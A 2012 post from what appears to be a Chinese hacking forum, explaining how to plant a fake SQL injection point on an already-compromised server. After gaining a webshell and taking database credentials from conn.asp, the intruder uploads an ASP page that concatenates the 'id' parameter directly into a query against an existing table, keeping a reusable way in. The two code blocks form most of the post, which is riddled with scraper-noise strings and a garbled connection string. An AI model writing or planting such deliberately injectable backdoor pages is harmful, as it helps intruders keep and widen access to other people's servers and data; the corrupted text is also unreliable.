找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1921|回复: 0
打印 上一主题 下一主题

自己构造注入点方便入侵

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 17:27:31 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
自己构造注入点方便入侵# `! s% c8 [4 F0 B1 p# p) f# U  B

$ B3 ^+ z, \; s4 Z6 G# s8 b今天看了rootkit论坛里面有人要我写出来关于伪造一个注入点,然后方便渗透,找到更多的可利用的信息$ |, h+ h* F; i! [9 |" ^" t  L
3 V9 w# U* d7 }8 D) n7 J
这两天一直考试,想了下,就先仍出来,有什么问题可以提出来,我们一起讨论!
, a4 a5 y& l: f6 G0 j. z
, }" Y2 E8 H" H首先你要拿了一个webshell,这样你找到连接数据库的文件,大多都是conn.asp这个文件里面有mssql的用户和
9 ]" Y" s  x" n
- K4 a6 {- `( _6 }- ~密码,你要找到用户名、密码、数据库所在的IP,然后连接上去,至于连接大家应该都会,找到网站管理员的表
& n: L' c! a/ D1 }
: Q- `4 B, H, ~3 c+ N因为我测试的时候是用管理员的表,我朋友说任何表名都可以,只要这个表存在,代码如下:
0 M& Q' {/ q$ [7 e! w
4 g+ E2 S9 |0 ~2 Y程序代码' }' M9 j. ?9 i
<!--#include file="xx.asp"-->5 Q: J  w3 Z/ D+ S0 v0 N. C0 o
<%
! h  _4 g  S5 J5 H3 \! \; ]set rs=server.createobject("ADODB.recordset")
5 Q; V$ I6 l# w. \) D+ Q+ x% V6 Did = request("id")
1 r; R; i8 u5 E4 n3 [% dstrSQL = "select * from admin where id=" & id3 L/ l( q+ |: Q  u. g
rs.open strSQL,conn,1,32 `% d4 G4 Y3 p6 C
rs.close
) c. g' C. |+ g8 y- S; i%>( ~% R* _7 ?! H/ g
8 B$ a6 g) l) b6 l$ y! k) C9 i
把strSQL = "select * from admin where id=" & id 这句话里面的admin换成要伪造的表名,注意必须存在7 Q' H+ m; |% H

9 Z7 {; L) f7 L9 c3 e0 @; w" j. }7 S) Z你可以连接上去看下表名就是了!这里假设的是admin是表名!这个文件名随便保存!
' C% P) w1 }- t$ {% Z
* ?- c" u% m9 }& M4 t# l7 e" Y然后就要构造一个连接数据库的文件了,代码如下:
7 N5 |) z4 e/ s: ?: f* [4 ?$ _$ C程序代码
  p# _5 N# e. ?' q<%        4 s! L. B- z. ?  ?  `  |0 l
strSQLServerName = "000.000.000.000"     '服务器名称或地址; t. K/ a5 v) `& S9 _( y
strSQLDBUserName = "sqlname"         '数据库帐号
8 a+ j4 h0 @& w/ t7 D/ VstrSQLDBPassword = "sqlpass"         '数据库密码9 ^9 b  g! k8 {8 n5 @. y! f
strSQLDBName = "sqldataname"           '数据库名称
: v. z5 j! Y( S9 i4 fSet conn = Server.CreateObject("ADODB.Connection")& A9 p9 a, M; c. D
strCon = "rovider=SQLOLEDB.1ersist Security Info=False;Server=" & strSQLServerName & ";User ID=" & strSQLDBUserName & "assword=" & strSQLDBPassword & ";Database=" & strSQLDBName & ";", S: Q4 u- P/ m
conn.open strCon
8 G  J) x$ m: {: f%>4 f9 N8 _$ D# r
; Q. Y4 Q, S) w
这里应该都会了,就不罗嗦了,不过注意的是保存的文件名要和include调用的名字一样。。还是罗嗦话,
# L0 \5 [% @& \. E1 P2 [
+ D: I$ V7 @( W4 Y# i8 {+ a就这样,正常情况下,就OK了,伪造成功……
4 Y. {( ?2 `/ ^6 w2 a6 ]7 {1 s
           如果有什么问题可以提出来大家一起探讨解决。
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表